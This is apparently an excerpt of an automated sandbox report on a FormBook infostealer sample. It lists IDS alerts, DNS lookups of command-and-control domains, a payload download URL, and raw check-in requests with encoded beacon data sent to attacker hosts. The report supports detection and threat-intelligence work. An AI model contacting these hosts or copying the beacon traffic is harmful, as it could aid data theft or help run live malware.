        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49823 -> 194.58.112.174:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49816 -> 38.47.207.120:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49841 -> 148.135.49.178:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49840 -> 148.135.49.178:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49827 -> 35.244.245.121:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49827 -> 35.244.245.121:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49836 -> 172.96.191.39:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49829 -> 85.159.66.93:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49842 -> 148.135.49.178:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49843 -> 148.135.49.178:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49850 -> 199.59.243.226:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49843 -> 148.135.49.178:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49855 -> 154.23.184.218:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49855 -> 154.23.184.218:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49846 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49833 -> 3.82.56.39:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49852 -> 154.23.184.218:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49834 -> 3.82.56.39:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49871 -> 194.58.112.174:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49835 -> 3.82.56.39:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49871 -> 194.58.112.174:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49835 -> 3.82.56.39:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49860 -> 203.161.42.73:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49844 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49872 -> 35.244.245.121:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49873 -> 35.244.245.121:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49845 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49854 -> 154.23.184.218:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49878 -> 85.159.66.93:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49859 -> 76.223.67.189:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49847 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49859 -> 76.223.67.189:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49847 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49839 -> 172.96.191.39:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49839 -> 172.96.191.39:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49848 -> 199.59.243.226:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49861 -> 203.161.42.73:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49849 -> 199.59.243.226:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49856 -> 76.223.67.189:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49863 -> 203.161.42.73:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49863 -> 203.161.42.73:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49851 -> 199.59.243.226:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49851 -> 199.59.243.226:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49853 -> 154.23.184.218:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49864 -> 38.47.207.120:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49857 -> 76.223.67.189:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49865 -> 38.47.207.120:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49866 -> 38.47.207.120:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49869 -> 194.58.112.174:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49867 -> 38.47.207.120:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49858 -> 76.223.67.189:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49867 -> 38.47.207.120:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49879 -> 85.159.66.93:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49879 -> 85.159.66.93:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49874 -> 35.244.245.121:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49862 -> 203.161.42.73:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49877 -> 85.159.66.93:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49876 -> 85.159.66.93:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49868 -> 194.58.112.174:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49870 -> 194.58.112.174:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49875 -> 35.244.245.121:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49875 -> 35.244.245.121:80
        Source: DNS query: www.tmglift.xyz
        Source: Joe Sandbox ViewIP Address: 76.223.67.189 76.223.67.189
        Source: Joe Sandbox ViewIP Address: 199.59.243.226 199.59.243.226
        Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
        Source: Joe Sandbox ViewASN Name: BODIS-NJUS BODIS-NJUS
        Source: Joe Sandbox ViewASN Name: COGENT-174US COGENT-174US
        Source: Joe Sandbox ViewASN Name: CIZGITR CIZGITR
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49806 -> 23.111.141.202:80
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /wRdZDseACWW137.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.kapiextra.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /y2fc/?AvLLLbOh=5ZJwW+6cR+ukQX5L66hOVx0TNjHyeT2hZgA90YyTgMK9x7yRXodN7xJ1LlWJY5c/jX+OBDC/YU0F38ZFJDu2iru/QAMqsMv9PfcDIAk5SRBflopttme4W2g=&7RB=66nPyLG8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.23ddv.topConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /7arp/?AvLLLbOh=dfy87afTC55YVvzS7S1jwLgcbi5w3JHzjavaxDQa19dB03jQskYCA8r/7anBB+vouT+V5ax+XjGkuRHs6us4BcBFQfXKdzJ7j1Tj8ZGM7Jn4YelEF6F15fQ=&7RB=66nPyLG8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.gyver.cloudConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /evtw/?AvLLLbOh=qMLUfIVxcy5BUPOFUVVokgWijQnF2zXXVKt01YDq7Fx24AU1CDxJrzkqkKWLAIZ/xY36wLggT1PRMlR6dRNA0wLKv5lzUDW7qQMZ0amG/MTffFaAFzA5nlM=&7RB=66nPyLG8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.vlyra.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /7te8/?AvLLLbOh=jDN4zPqbFf9yM+3zgc/bkSOt3FtgrIUvIR/YWyCTW7MfoJq2/oprJylb09/bpIujsG26CmWa4QbZN3EYlCF2dF9UrXrnLyDZVZ+LwV0bzVblUs0ijF56Mzs=&7RB=66nPyLG8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.tyai36.topConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /1fqp/?7RB=66nPyLG8&AvLLLbOh=6qQxmJ3Ttl5RniwiWug+Nxykd+6yd18sY/lOZ1tjFrv55oSFkvFWhSP7kPUWLsM6iDX/GYi1Ud/wPB7htSWHGJqJldTcfRVJgzvdZiQtfUg3P6HLle1MpkQ= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.indeks.spaceConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /x85c/?AvLLLbOh=Y3mIzDGxysayARzY45AnHIIy2B4pc2sd+rPTtixWlkJfFxNC1K7RiT+8e26JUdxdhynJ2ADdGNEqJqOO4cICPBs0jMW0AIUC/yJyUu4ejJJDyAbCIM7A/9A=&7RB=66nPyLG8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.kiristyle.shopConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /fu44/?AvLLLbOh=MlL7Bon/74QoG2vpxD8T9dipagYbr0R/tXGKYkMRJkwHHENkeAO2oHPD98qp5zZW/5TdXnrAZisENNCTsRHdM0U4DZ3reu4ViZt4mxUl7os1vic25L7j48U=&7RB=66nPyLG8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.tmglift.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /q3za/?AvLLLbOh=RWnANPBTnIHygAxj+74p2fQt/r+QMu+ZbRPK+z1nLy5TPZ7mlunYNOVzlFQ68L6IsvBO8bEu8tkdQ9B+wYsoyn5BHOSzYZ2Hj+i3Yz8xBJ+jGbXNJ7HrFvE=&7RB=66nPyLG8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.theaji.shopConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /frol/?AvLLLbOh=YNeTF4pSv4+M6gG3KqO7busQPotc22z/OB6yhtk01jUCobC9Y52Gmw3Z99Ir4kEoVNEa+n0iDPzrnsm9kM3Fz3qyLYlg0011pg2PCcWBraIo86SjG5d0+YE=&7RB=66nPyLG8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.bola88site.oneConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /w4ze/?7RB=66nPyLG8&AvLLLbOh=d0Jtowaj2cDKdGl/ZWixKoK2UJz0xOtSqBjDY2hG4a3QahhJ7y0n5KAnu51LUWnaBzfk1RzCzkwasvfXjgFxQ6WD3nD/I11dyUYYEHS/n2QZzV395iZlwCs= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.policydetails.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /euco/?AvLLLbOh=GPABfGdOLFG14n4QgnBiZ+BsyIvrzjVDDLyvQv6auzHiN3b/aWsmGL4J/M+2YRVr/47k2ZlpprwluvqtoYpidrJVs8sq2aKxZBcIKy6V2Ahz0rKVLGXmBGY=&7RB=66nPyLG8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.at8l4.shopConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /i0bg/?AvLLLbOh=bQKVVFfanjNZBfdcIZop/p51Kq/q4DLd8P4GjEmXCojBwWm3h7h09nlNydz6D8la1AjIsgIaNvk5Cs0Spg0Y+chR33DfPPxX8Qm8eqAyl/PDJccbAQNQv5M=&7RB=66nPyLG8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.dom-2.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /y2fc/?AvLLLbOh=5ZJwW+6cR+ukQX5L66hOVx0TNjHyeT2hZgA90YyTgMK9x7yRXodN7xJ1LlWJY5c/jX+OBDC/YU0F38ZFJDu2iru/QAMqsMv9PfcDIAk5SRBflopttme4W2g=&7RB=66nPyLG8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.23ddv.topConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /7arp/?AvLLLbOh=dfy87afTC55YVvzS7S1jwLgcbi5w3JHzjavaxDQa19dB03jQskYCA8r/7anBB+vouT+V5ax+XjGkuRHs6us4BcBFQfXKdzJ7j1Tj8ZGM7Jn4YelEF6F15fQ=&7RB=66nPyLG8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.gyver.cloudConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /evtw/?AvLLLbOh=qMLUfIVxcy5BUPOFUVVokgWijQnF2zXXVKt01YDq7Fx24AU1CDxJrzkqkKWLAIZ/xY36wLggT1PRMlR6dRNA0wLKv5lzUDW7qQMZ0amG/MTffFaAFzA5nlM=&7RB=66nPyLG8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.vlyra.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /7te8/?AvLLLbOh=jDN4zPqbFf9yM+3zgc/bkSOt3FtgrIUvIR/YWyCTW7MfoJq2/oprJylb09/bpIujsG26CmWa4QbZN3EYlCF2dF9UrXrnLyDZVZ+LwV0bzVblUs0ijF56Mzs=&7RB=66nPyLG8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.tyai36.topConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /1fqp/?7RB=66nPyLG8&AvLLLbOh=6qQxmJ3Ttl5RniwiWug+Nxykd+6yd18sY/lOZ1tjFrv55oSFkvFWhSP7kPUWLsM6iDX/GYi1Ud/wPB7htSWHGJqJldTcfRVJgzvdZiQtfUg3P6HLle1MpkQ= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.indeks.spaceConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /x85c/?AvLLLbOh=Y3mIzDGxysayARzY45AnHIIy2B4pc2sd+rPTtixWlkJfFxNC1K7RiT+8e26JUdxdhynJ2ADdGNEqJqOO4cICPBs0jMW0AIUC/yJyUu4ejJJDyAbCIM7A/9A=&7RB=66nPyLG8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.kiristyle.shopConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /fu44/?AvLLLbOh=MlL7Bon/74QoG2vpxD8T9dipagYbr0R/tXGKYkMRJkwHHENkeAO2oHPD98qp5zZW/5TdXnrAZisENNCTsRHdM0U4DZ3reu4ViZt4mxUl7os1vic25L7j48U=&7RB=66nPyLG8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.tmglift.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
        Source: global trafficDNS traffic detected: DNS query: www.kapiextra.com
        Source: global trafficDNS traffic detected: DNS query: www.ayna-pro.shop
        Source: global trafficDNS traffic detected: DNS query: www.23ddv.top
        Source: global trafficDNS traffic detected: DNS query: www.gyver.cloud
        Source: global trafficDNS traffic detected: DNS query: www.vlyra.online
        Source: global trafficDNS traffic detected: DNS query: www.tyai36.top
        Source: global trafficDNS traffic detected: DNS query: www.950021.com
        Source: global trafficDNS traffic detected: DNS query: www.indeks.space
        Source: global trafficDNS traffic detected: DNS query: www.kiristyle.shop
        Source: global trafficDNS traffic detected: DNS query: www.tmglift.xyz
        Source: global trafficDNS traffic detected: DNS query: www.esistiliya.online
        Source: global trafficDNS traffic detected: DNS query: www.theaji.shop
        Source: global trafficDNS traffic detected: DNS query: www.bola88site.one
        Source: global trafficDNS traffic detected: DNS query: www.policydetails.online
        Source: global trafficDNS traffic detected: DNS query: www.terrearcenciel.online
        Source: global trafficDNS traffic detected: DNS query: www.at8l4.shop
        Source: global trafficDNS traffic detected: DNS query: www.dom-2.online
        Source: unknownHTTP traffic detected: POST /7arp/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-USHost: www.gyver.cloudOrigin: http://www.gyver.cloudReferer: http://www.gyver.cloud/7arp/Content-Length: 205Cache-Control: no-cacheContent-Type: application/x-www-form-urlencodedConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 51 64 61 63 34 74 61 74 41 71 38 39 4c 66 2f 58 6e 77 39 56 75 5a 56 6b 54 77 42 4b 37 35 6a 52 67 5a 7a 61 35 41 30 59 32 66 51 66 6f 77 4b 70 35 33 39 45 44 4d 6a 5a 78 49 37 31 48 66 72 51 31 57 79 4a 2b 59 52 45 55 47 61 31 78 7a 4b 6b 72 50 4e 59 45 4d 41 6d 54 34 61 4d 65 6d 63 4e 69 7a 62 59 2b 37 6e 45 37 4e 71 49 65 66 35 32 50 36 52 43 2b 5a 58 4e 6b 41 46 6a 70 71 47 57 50 38 78 76 4b 71 59 39 63 63 4c 4c 79 46 73 47 45 5a 37 47 50 46 65 37 51 78 42 56 79 57 33 6e 75 5a 51 7a 35 31 66 72 6b 6b 54 42 41 34 6e 6f 43 4b 35 62 34 72 69 45 4b 30 5a 79 7a 59 30 32 76 77 3d 3d Data Ascii: AvLLLbOh=Qdac4tatAq89Lf/Xnw9VuZVkTwBK75jRgZza5A0Y2fQfowKp539EDMjZxI71HfrQ1WyJ+YREUGa1xzKkrPNYEMAmT4aMemcNizbY+7nE7NqIef52P6RC+ZXNkAFjpqGWP8xvKqY9ccLLyFsGEZ7GPFe7QxBVyW3nuZQz51frkkTBA4noCK5b4riEK0ZyzY02vw==
